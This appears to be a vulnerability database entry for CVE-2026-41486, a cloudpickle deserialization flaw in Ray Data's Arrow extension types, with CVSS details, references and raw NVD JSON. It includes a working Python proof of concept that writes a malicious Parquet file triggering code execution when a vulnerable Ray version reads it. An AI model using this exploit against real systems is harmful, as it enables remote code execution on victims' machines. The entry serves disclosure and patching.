CVE-2026-41486

Description

Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read. This issue has been patched in version 2.55.0.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:anyscale:ray:2.54.0:*:*:*:*:*:*:* - VULNERABLE

Ray 2.54.0

Ray < 2.55.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pyarrow as pa
import pyarrow.parquet as pq
import cloudpickle
import os

# Define a malicious payload to be executed
# For demonstration, this creates a file, but could be any command
def malicious_function():
    print("[!] RCE Triggered via Cloudpickle")
    with open("/tmp/pwned.txt", "w") as f:
        f.write("CVE-2026-41486 Exploited")

# Serialize the payload using cloudpickle
serialized_payload = cloudpickle.dumps(malicious_function)

# Construct Parquet metadata pointing to Ray's extension type
# Ray registers 'ray.data.arrow_tensor' globally.
# We set the metadata key 'ARROW:extension:metadata' to our payload.
metadata = {
    b"ARROW:extension:name": b"ray.data.arrow_tensor",
    b"ARROW:extension:metadata": serialized_payload
}

# Create a field with the malicious metadata
field = pa.field("exploit_field", pa.binary(), metadata=metadata)
schema = pa.schema([field])

# Create a dummy table with minimal data
table = pa.table({"exploit_field": [b"dummy_data"]})

# Write the malicious Parquet file
pq.write_table(table, "cve_2026_41486_exploit.parquet", schema=schema)
print("Malicious Parquet file generated: cve_2026_41486_exploit.parquet")
print("When a vulnerable Ray version reads this file, the payload will execute.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41486
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41486
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41486/
[4] VulDB https://vuldb.com/cve/CVE-2026-41486
[5] https://github.com/ray-project/ray/commit/c02bd31ae31996805868baa446a131a8d304525f
[6] https://github.com/ray-project/ray/pull/62056
[7] https://github.com/ray-project/ray/releases/tag/ray-2.55.0
[8] https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41486", "sourceIdentifier": "[email protected]", "published": "2026-05-08T22:16:29.903", "lastModified": "2026-05-18T18:30:53.233", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read. This issue has been patched in version 2.55.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anyscale:ray:2.54.0:*:*:*:*:*:*:*", "matchCriteriaId": "79D84338-429D-4550-9640-092CA38479B8"}]}]}], "references": [{"url": "https://github.com/ray-project/ray/commit/c02bd31ae31996805868baa446a131a8d304525f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ray-project/ray/pull/62056", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/ray-project/ray/releases/tag/ray-2.55.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}